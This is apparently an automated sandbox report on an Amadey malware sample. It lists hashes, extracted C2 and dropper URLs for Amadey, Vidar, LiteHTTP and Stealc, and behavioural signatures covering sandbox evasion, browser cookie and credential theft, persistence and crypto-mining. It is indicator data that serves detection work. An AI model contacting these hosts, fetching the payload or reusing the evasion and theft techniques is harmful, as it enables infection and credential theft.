amadey | 7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5

Analysis

max time kernel
134s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
06/03/2025, 02:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
Size

3.0MB
MD5

0bb2dfa71df9837891461fc5f1da8f9a
SHA1

4d8fb1ce5798f279c193fd87b4967ee84f4090ad
SHA256

7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5
SHA512

83cdd3fff5aec7e141ea9c85d8c00df0338f3b61d7c5c5c4a3bd44753c810984e003986cd38ffb297088296afaeb3e9e199409841509a405fae942ea4cc3487e
SSDEEP

49152:vaQi+RuFOPEr65mI2/vMB6umvmCsDdWG9C2wwMLtYYDq3/zMdK:vaQiCMOPEe5m9HqyvzaAGjwweaPzMM

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

vidar

Botnet

ir7am

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

litehttp

Version

v1.0.9

http://185.208.156.162/page.php

Attributes

key
v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 30 IoCs

stealer

resource	yara_rule
behavioral2/memory/2168-273-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-275-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-418-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-419-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-424-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-425-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-428-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-432-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-433-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-437-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-438-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-450-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-790-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-909-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-910-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-911-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-956-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-957-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-960-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-964-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-968-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-969-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-993-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-995-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-998-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-999-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-1000-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-1001-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-1002-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7
behavioral2/memory/2168-1006-0x0000000000400000-0x0000000000429000-memory.dmp	family_vidar_v7

Detects Healer an antivirus disabler dropper 2 IoCs

resource	yara_rule
behavioral2/memory/1728-1797-0x0000000000320000-0x0000000000776000-memory.dmp	healer
behavioral2/memory/1728-1796-0x0000000000320000-0x0000000000776000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
LiteHTTP
LiteHTTP is an open-source bot written in C#.
stealer bot litehttp
Litehttp family
litehttp
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c838ad95a8.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ZEDHTUROOZA3TPCV95R8JRJG4J.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3D9ML36IIYJUDX6SUS4T.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4b25e374a7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	698bfc576e.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	551d2e41be.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4c1995acbe.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempDR9FKXDOJJWR66KNTJ7YAFQPK5WCCDSC.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4d1551b4cb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/memory/5880-1005-0x00007FF62CA90000-0x00007FF62D354000-memory.dmp	xmrig
behavioral2/memory/5880-1007-0x00007FF62CA90000-0x00007FF62D354000-memory.dmp	xmrig

Blocklisted process makes network request 3 IoCs

flow	pid	Process
55	2120	powershell.exe
56	2324	powershell.exe
132	3196	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2120	powershell.exe
2324	powershell.exe
3196	powershell.exe
4208	powershell.exe
4088	powershell.exe
888	powershell.exe
5304	powershell.exe
3196	powershell.exe
2220	powershell.exe

Downloads MZ/PE file 23 IoCs

flow	pid	Process
55	2120	powershell.exe
56	2324	powershell.exe
294	2124	551d2e41be.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
54	3956	rapes.exe
248	5520	BitLockerToGo.exe
45	4508	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe

Uses browser remote debugging 2 TTPs 16 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
5680	chrome.exe
5324	msedge.exe
2780	chrome.exe
1644	chrome.exe
3676	chrome.exe
5128	msedge.exe
6112	msedge.exe
5496	msedge.exe
5536	msedge.exe
5972	chrome.exe
5316	chrome.exe
1468	msedge.exe
4328	chrome.exe
1692	chrome.exe
5740	chrome.exe
5980	msedge.exe

.NET Reactor proctector 3 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/files/0x0012000000023de4-261.dat	net_reactor
behavioral2/memory/4320-271-0x0000000000960000-0x00000000009C0000-memory.dmp	net_reactor
behavioral2/memory/1728-1792-0x0000000000320000-0x0000000000776000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 32 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3D9ML36IIYJUDX6SUS4T.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	FvbuInU.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	v6Oqdnc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4b25e374a7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4c1995acbe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3D9ML36IIYJUDX6SUS4T.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempDR9FKXDOJJWR66KNTJ7YAFQPK5WCCDSC.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c838ad95a8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c838ad95a8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4b25e374a7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	698bfc576e.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4c1995acbe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	551d2e41be.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ZEDHTUROOZA3TPCV95R8JRJG4J.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ZEDHTUROOZA3TPCV95R8JRJG4J.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4d1551b4cb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	551d2e41be.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempDR9FKXDOJJWR66KNTJ7YAFQPK5WCCDSC.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4d1551b4cb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	698bfc576e.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	PcAIvJ0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	mAtJWNv.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	3D9ML36IIYJUDX6SUS4T.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	nhDLtPT.exe
Key value queried	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Control Panel\International\Geo\Nation	mshta.exe

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	zY9sqWs.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe	zY9sqWs.exe

Executes dropped EXE 33 IoCs

pid	Process
1124	3D9ML36IIYJUDX6SUS4T.exe
3956	rapes.exe
232	957bc300ff.exe
2364	TempDR9FKXDOJJWR66KNTJ7YAFQPK5WCCDSC.EXE
1580	nhDLtPT.exe
2456	Gxtuum.exe
4996	483d2fa8a0d53818306efeb32d3.exe
4380	Ps7WqSx.exe
4700	FvbuInU.exe
4320	mAtJWNv.exe
2168	mAtJWNv.exe
1464	ce4pMzk.exe
5016	rapes.exe
668	Gxtuum.exe
624	MCxU5Fj.exe
4540	MCxU5Fj.exe
3868	MCxU5Fj.exe
2488	MCxU5Fj.exe
2252	MCxU5Fj.exe
3468	v6Oqdnc.exe
4432	PcAIvJ0.exe
3952	zY9sqWs.exe
5548	4d1551b4cb.exe
3412	4b25e374a7.exe
5236	d77ee32371.exe
5796	d77ee32371.exe
5624	c838ad95a8.exe
5112	rapes.exe
5016	Gxtuum.exe
5832	698bfc576e.exe
2124	551d2e41be.exe
5488	4c1995acbe.exe
5496	ZEDHTUROOZA3TPCV95R8JRJG4J.exe

Identifies Wine through registry keys 2 TTPs 16 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	3D9ML36IIYJUDX6SUS4T.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	FvbuInU.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	4b25e374a7.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	698bfc576e.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	4c1995acbe.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	TempDR9FKXDOJJWR66KNTJ7YAFQPK5WCCDSC.EXE
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	c838ad95a8.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	ZEDHTUROOZA3TPCV95R8JRJG4J.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	551d2e41be.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	v6Oqdnc.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	4d1551b4cb.exe
Key opened	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\Software\Wine	rapes.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\957bc300ff.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108470101\\957bc300ff.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10108480121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\cL3YjvDX\\Anubis.exe\""	ce4pMzk.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\551d2e41be.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109310101\\551d2e41be.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-250031470-1197856012-2659781506-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4c1995acbe.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10109320101\\4c1995acbe.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
214	pastebin.com
216	pastebin.com

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x0007000000023dc2-37.dat	autoit_exe
behavioral2/files/0x0007000000023eff-1194.dat	autoit_exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
2860	tasklist.exe
1468	tasklist.exe
5136	tasklist.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs

pid	Process
4508	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
1124	3D9ML36IIYJUDX6SUS4T.exe
3956	rapes.exe
2364	TempDR9FKXDOJJWR66KNTJ7YAFQPK5WCCDSC.EXE
4996	483d2fa8a0d53818306efeb32d3.exe
4700	FvbuInU.exe
5016	rapes.exe
3468	v6Oqdnc.exe
5548	4d1551b4cb.exe
3412	4b25e374a7.exe
5624	c838ad95a8.exe
5112	rapes.exe
5832	698bfc576e.exe
2124	551d2e41be.exe
5488	4c1995acbe.exe
5496	ZEDHTUROOZA3TPCV95R8JRJG4J.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4320 set thread context of 2168	4320	mAtJWNv.exe	142
PID 624 set thread context of 2488	624	MCxU5Fj.exe	153
PID 5236 set thread context of 5796	5236	d77ee32371.exe	202
PID 3444 set thread context of 5880	3444	Explorer.EXE	205
PID 3412 set thread context of 5520	3412	4b25e374a7.exe	207
PID 5624 set thread context of 3600	5624	c838ad95a8.exe	216

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	3D9ML36IIYJUDX6SUS4T.exe
File created	C:\Windows\Tasks\Gxtuum.job	nhDLtPT.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
4172	4320	WerFault.exe	141
3788	624	WerFault.exe	149
5476	5236	WerFault.exe	201

System Location Discovery: System Language Discovery 1 TTPs 44 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	698bfc576e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nhDLtPT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zY9sqWs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c838ad95a8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempDR9FKXDOJJWR66KNTJ7YAFQPK5WCCDSC.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	551d2e41be.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4c1995acbe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3D9ML36IIYJUDX6SUS4T.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MCxU5Fj.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4b25e374a7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	957bc300ff.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Ps7WqSx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4d1551b4cb.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7a5c839efa806aabcd5daca5db7a23823d5273b951cb59bc264bf4fb2042f2a5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FvbuInU.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	v6Oqdnc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d77ee32371.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d77ee32371.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ZEDHTUROOZA3TPCV95R8JRJG4J.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mAtJWNv.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mAtJWNv.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	4c1995acbe.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	4c1995acbe.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
2040	timeout.exe
3616	timeout.exe

